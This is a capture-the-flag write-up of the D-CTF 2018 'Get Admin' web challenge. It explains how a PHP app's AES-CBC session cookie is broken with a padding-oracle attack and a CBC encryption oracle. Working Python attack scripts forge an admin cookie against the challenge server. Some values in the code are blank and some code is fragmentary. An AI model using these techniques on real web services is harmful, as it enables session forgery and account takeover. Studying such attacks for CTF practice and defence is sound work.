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Get Admin

[D-CTF Qualifiers, 2018]

category: web

by exo

  • Category: web
  • Points: 220
  • Description:

This is a very unexpected gig for me. However, I'm busy with other projects so can you please give me a hand to test this. For free, of course. :-)

Files: https://dctf.def.camp/dctf-18-quals-81249812/get-admin.zip Target: https://admin.dctfq18.def.camp/

Author: Andrei


A web challenge in php and we even get the source code! So let's start to analyze the app.

We have the usual scheme of interaction: We can register, login and after that we are redirected to /admin.php, where we would get the flag:

if($_SESSION['userid'] === "1") {
    echo FLAG;
} else {
    echo 'Try harder.';

So how do the registration work? This part is very straight forward. The username, password and email are sent to "Authlib":

$response =  $auth->createUser($_POST['username'],$_POST['password'], $_POST['email']);

After that, prepared statements are correctly used to insert the user into the database. So nothing vulnerable there.

The next thing to take a look at is the login. This is handled in index.php:

if (!isset($_SESSION['userid'])) {
    if(!empty($_COOKIE['user'])) {
        $u = decryptCookie($_COOKIE['user']);
        if($u['id'] > 0) {
            $_SESSION['userid'] = $u['id'];
            header("Location: /admin.php");
        die('Invalid cookie.');
    } else if(isset($_POST['username'], $_POST['password'])) {
        $auth = new AuthLib($db);
        $userid = (int) $auth->authenticate($_POST['username'], $_POST['password']);
        if ($userid) {
            $q = $db->query('SELECT * FROM `users` where id='.$userid);
            $row = $q->fetch(\PDO::FETCH_ASSOC);
            $_SESSION['userid'] = $userid;
                'id' => $userid,
                'username' => $_POST['username'],
                'email' => $row['email'],
            ]), time()+60*60*24*30);
            header("Location: /admin.php");
} else {

We can see that there are actually two possibilities to login. One way is via the form using username and password. This sets the user cookie, which can be used to login another time instead of providing username and password. So if we can forge a cookie with a userid of 1, we are done.


The cookie is actually encrypted, so we analyze that:

function encryptCookie($arr) {
    $cookie = compress($arr);
    $arr['checksum'] = crc32($cookie);
    return encrypt(compress($arr), AES_KEY, AES_IV);
function compress($arr) {
    return implode('÷', array_map(function ($v, $k) { return $k.'¡'.$v; }, $arr, array_keys($arr) ));
function encrypt($plaintext, $key, $iv) {
    $length     = strlen($plaintext);
    $ciphertext = openssl_encrypt($plaintext, 'AES-128-CBC', $key, OPENSSL_RAW_DATA, $iv);
    return base64_encode($ciphertext) . sprintf('%06d', $length);

First encryptCookie is called with our $userid (coming from the database), our username (that we chose), and the email address already stored in the database. This is passed as a PHP named array to compress, which actually just concatenates the array using the two byte long Unicode characters ÷ (\xc2\xa1) and ¡ (\xc3\xb7) as separators.

Then the CRC32 of the result is calculated and set as another entry in the array. The resulting array is encoded again and then this string is fed into AES-128-CBC. Note that the IV that is used is a PHP constant and is the same for every encryption. The result of the AES encryption is then byse64 encoded. Lastly a 6 character $length is appended in plaintext and the result is set as the user cookie.

Due to the reuse of the IV, we get deterministic results when logging in multiple times. We however cannot decrypt our own cookie and therefore do not know our id and checksum.


Next we take a look at how the cookie is being interpreted when we use it to login.

function decryptCookie($cypher) {
    return decompress(decrypt($cypher, AES_KEY, AES_IV));
function decrypt($ciphertext, $key, $iv) {
    $length     = intval(substr($ciphertext, -6, 6));
    $ciphertext = substr($ciphertext, 0,-6);
    $output     = openssl_decrypt(base64_decode($ciphertext), 'AES-128-CBC', $key, OPENSSL_RAW_DATA, $iv);
    if($output == FALSE) {
        echo('Decryption error (0).');
    return substr($output, 0, $length);
function decompress($cookie) {
    if(preg_match('/[^\x00-\x7F]+\ *(?:[^\x00-\x7F]| )*/im',$cookie, $m) == 0) {
        echo('Decryption error (1).');
        return false;
    $t = explode("÷", $cookie);
    $arr = [];
    foreach($t as $el) {
        $el = explode("¡", $el);
        $arr[$el[0]] = $el[1];
    if(!isset($arr['checksum'])) {
        echo('Decryption error (2).');
        return false;
    $checksum = intval($arr['checksum']);
    $cookie = compress($arr);
    if($checksum != crc32($cookie)) {
        echo('Decryption error (3).');
        return false;
    return $arr;

So our cookie is first AES-CBC decrypted. If this operation fails, we get the 'Decryption error (0).'. This is the only time we get this specific error message and the only way for the decryption to fail in this phase is if the padding at the end of the last block is incorrect.

This means we have a padding oracle, which we can use to decrypt our cookie. There is a nice library called python-paddingoracle that implements a standard padding oracle attack. We only need to implement the oracle part via python requests. To do so, we modified the example code from the readme file:

from paddingoracle import BadPaddingException, PaddingOracle
class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        self.wait = kwargs.get('wait', 2.0)
    def oracle(self, data, **kwargs):
        user_cookie = quote(b64encode(data)) + "000071"
        self.session.cookies['user'] = user_cookie
        while True:
                response = self.session.get('https://admin.dctfq18.def.camp',
                        stream=False, timeout=5, verify=False)
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...',
        if "Decryption error (0)." in response.text:
            raise BadPaddingException
        print('No padding exception raised on %r'% user_cookie)
encrypted_cookie = unquote("USVx0XaRKUqRjovB1%2BLShzc4Cj7G4s5Iyk9Rx%2BCmi7vBRVeinUtxW7vPekFMQjsw%2BlYqkHtc1R9oJoOBs0KAXZ6zbGkzs3HthZBWxX%2FlAvY%3D000071")
aes_part = b64decode(encrypted_cookie[:-6])
len_str = encrypted_cookie[-6:]
padbuster = PadBuster()
cookie = padbuster.decrypt(aes_part, block_size=AES.block_size, iv=bytearray(8))

Now we are able to decrypt our own cookie byte by byte. The result is:

b'".\x83\xf2xx~\x89\xe44?.4$*,e\xc2\xa1asdfasdf\xc3\xb7email\xc2\xa1[email protected]\xc3\xb7checksum\xc2\xa11467050118\t\t\t\t\t\t\t\t\t'

We can see that the decryption succeeded except for the first block. This is because we do not know the IV that was XORed to it during encryption. Because we know the structure of the plaintext, we are however able to recover parts of the IV.

Except for our id, we know the first block of the plaintext must be:


XORed with the first block of the padding oracle result, this gives us the IV (except for the three unknown characters where our id is):


So the IV does only consist of uppercase letters. The three remaining unknown bytes are our id. We can brute force that using the checksum to verify our result. For some reason this did not work in python so we implemented in in PHP (which would have been less work anyway):

for ($i = 0; $i < 1000; $i++) {
  $arr = [
      'id' => strval($i),
      'username' => "asdfasdf",
      'email' => "[email protected]",
  $mycrc = crc32(compress($arr));
  if (1467050118 == $mycrc) {
  print("id: " . $i . "\n");

We now know our id (438), so we can recover the rest of the IV using XOR:


As it turns out, it was not required to recover the IV to solve the challenge, but it was fun anyway :)

We can calculate the CRC ourselves in PHP:

$arr = [
    'id' => "1",
    'username' => "admin",
    'email' => '[email protected]'
$compr = compress($arr);
$mycrc = crc32(compress($arr));
$arr['checksum'] = strval($mycrc);
print("crc: " . $mycrc . "\n");

To become admin we must forge a cookie where the id is 1. This would look like this:

'id\xc2\xa11\xc3\xb7username\xc2\xa1admin\xc3\xb7email\xc2\xa1[email protected]\xc3\xb7checksum\xc2\xa1197680336'

It is not possible to just flip bits to change the checksum and append id\xc2\xa11 in the last block because the result is checked to have a valid checksum for the plaintext (which we do not )

But our id is different for every user we create, so all following blocks will be XORed with something we do not control. Conveniently there is a profile page that lets us change our email address at a later time. This gives us an encryption oracle if we use the properties of AES-CBC to our advantage.

During encryption, the blocks are encrypted as follows:

c1 = AES(p1 XOR IV)
c2 = AES(p2 XOR c1)
c3 = AES(p3 XOR c2)

We can login with an email address that fills up an entire block (p3). This gives us the ciphertext (c2) that is XORed to p3 before encryption. Then we XOR the bock we want to encrypt (t) with c2 and change our email address to that. When we login again, we get:

c1 = AES(p1 XOR IV)
c2 = AES(p2 XOR c1)
c3' = AES((t XOR c2) XOR c2) = AES(t)

We have now successfully encrypted the block t and can get the result in c3'.

This attack would not have required us to recover the IV, since we can just replace blocks in our existing cookie. But we already had the IV, so we can create an entirely new cookie.

We wrote a python script to implement this attack, which gave us our forged cookie:


After creating the cookie, all we need to do is login and retrieve the flag:



It was a nice crypto challenge (even though it was flagged as web) and I learned a lot. In hindsight, the entire padding oracle would not have been necessary. It made the encryption oracle a lot easier though.



from base64 import b64encode, b64decode
from urllib import quote, unquote, quote_plus
import requests
import socket
import time
import binascii
import logging
import sys
import urllib3
from Crypto.Cipher import AES
from paddingoracle import BadPaddingException, PaddingOracle
class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        self.wait = kwargs.get('wait', 2.0)
    def oracle(self, data, **kwargs):
        user_cookie = quote(b64encode(data)) + "000071"
        self.session.cookies['user'] = user_cookie
        while True:
                response = self.session.get('https://admin.dctfq18.def.camp',
                        stream=False, timeout=5, verify=False)
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...',
        if "Decryption error (0)." in response.text:
            raise BadPaddingException
        print('No padding exception raised on %r'% user_cookie)
encrypted_cookie = unquote("USVx0XaRKUqRjovB1%2BLShzc4Cj7G4s5Iyk9Rx%2BCmi7vBRVeinUtxW7vPekFMQjsw%2BlYqkHtc1R9oJoOBs0KAXZ6zbGkzs3HthZBWxX%2FlAvY%3D000071")
aes_part = b64decode(encrypted_cookie[:-6])
len_str = encrypted_cookie[-6:]
padbuster = PadBuster()
cookie = padbuster.decrypt(aes_part, block_size=AES.block_size, iv="KJASLKFJSALKFJKA")


from base64 import b64encode, b64decode
from urllib import quote, unquote, quote_plus
import requests
import socket
import time
import binascii
import logging
import sys
import urllib3
from Crypto.Cipher import AES
DOMAIN = "https://admin.dctfq18.def.camp"
def register(s, user, passw, email):
    return s.post(DOMAIN + "/register.php", data={"confirm_password": passw, "email": email, "password": passw, "username": user})
def login(s, user, passw):
    res = s.post(DOMAIN + "/", data={"username": user, "password": passw, "lg_remember": "on"})
    assert("Admin</div>" in res.text)
    return res
def changeEmail(s, user, passw, email):
    s.post(DOMAIN + "/profile.php", data={"confirm_password": passw, "email": email, "password": passw, "username": user})
    s = requests.session()
    res = login(s, user, passw)
    return res
def getCookie(user, passw):
    s = requests.session()
    res = login(s, user, passw)
    return s.cookies['user']
def decodeCookie(cookie):
    un_cookie = unquote(cookie)
    return (b64decode(un_cookie[:-6]), un_cookie[-6:])
def blocks(chain):
    cnt = len(chain) / 16
    return [chain[16*i:16*(i+1)] for i in range(cnt)]
def xor(a, b):
    return ''.join(chr(ord(x)^ord(y)) for x,y in zip(a, b))
def pad(x):
    plen = 16-len(x)%16
    return chr(plen) * plen
def getPreblock():
    s = requests.session()
    res = login(s, user, passw)
    changeEmail(s, user, passw, mail_start + "a"*16)
    cookie = getCookie(user, passw)
    aes_part, len_str = decodeCookie(cookie)
    print([binascii.hexlify(x) for x in blocks(aes_part)])
    pre_block = blocks(aes_part)[2]
    return pre_block
user = "asdfqwer"
passw = "hacker1"
mail_start = "[email protected]"
target_cookie = "id\xc2\xa11\xc3\xb7username\xc2\xa1admin\xc3\xb7email\xc2\xa1[email protected]\xc3\xb7checksum\xc2\xa1197680336"
target_cookie = target_cookie + pad(target_cookie)
s = requests.session()
res = register(s, user, passw, mail_start)
target_blocks = blocks(target_cookie)
pre_block = getPreblock()
last_ct_block = IV
ct_blocks = []
for target_block in target_blocks:
    submission = xor(target_block, pre_block)
    submission = xor(submission, last_ct_block)
    res = login(s, user, passw)
    changeEmail(s, user, passw, mail_start + submission)
    cookie = getCookie(user, passw)
    aes_part, len_str = decodeCookie(cookie)
    print([binascii.hexlify(x) for x in blocks(aes_part)])
    ct_block = blocks(aes_part)[3]
    last_ct_block = ct_block
ct_chain = ''.join(ct_blocks)
fin_cookie = quote_plus(b64encode(ct_chain)) + "%06d"%(len(target_cookie) - ord(target_cookie[-1]))
/writeups/ $
